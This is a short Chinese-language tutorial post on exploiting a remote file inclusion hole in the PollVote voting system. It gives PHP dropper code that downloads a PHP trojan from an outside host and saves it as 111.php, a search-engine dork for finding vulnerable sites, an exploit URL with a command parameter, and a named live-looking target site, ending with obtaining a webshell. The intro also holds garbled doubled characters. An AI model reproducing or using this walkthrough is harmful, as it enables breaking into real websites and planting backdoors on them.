PollVote投票系统漏洞利用

时间:2021-03-17 人气:0

想了解PollVote投票系统漏洞利用的相关内容吗，在本文为您仔细讲解的相关知识和一些Code实例，欢迎阅读和指正，我们先划重点：PoollllVVoottee投投票票系系统统漏漏洞洞利利用用，下面大家一起来学习吧。

PollVote是一个投票系统，今天看了非安全的杂志，看了利用方法，

不过作者说利用过程的时候很烦琐，关键的时候又没说明白，

简单的说一下``

首先建立2个文本分别是creatfile.txt和phpdoor.txt

creatfile.txt内容写

<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>

phpdoor.txt内容就写个PHP木马

之后在http://www.google.com 搜索关键词"pollvote.php?pollname"

有很多，
搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg

就是他了

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls

这个就是利用原理了，
刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里

执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt

这样
phpdoor.txt里的内容就会生成一个111.php

这样我们就得到WEBSHELL了

http://www.skinnyturd.co.uk/poll/111.php

加载全部内容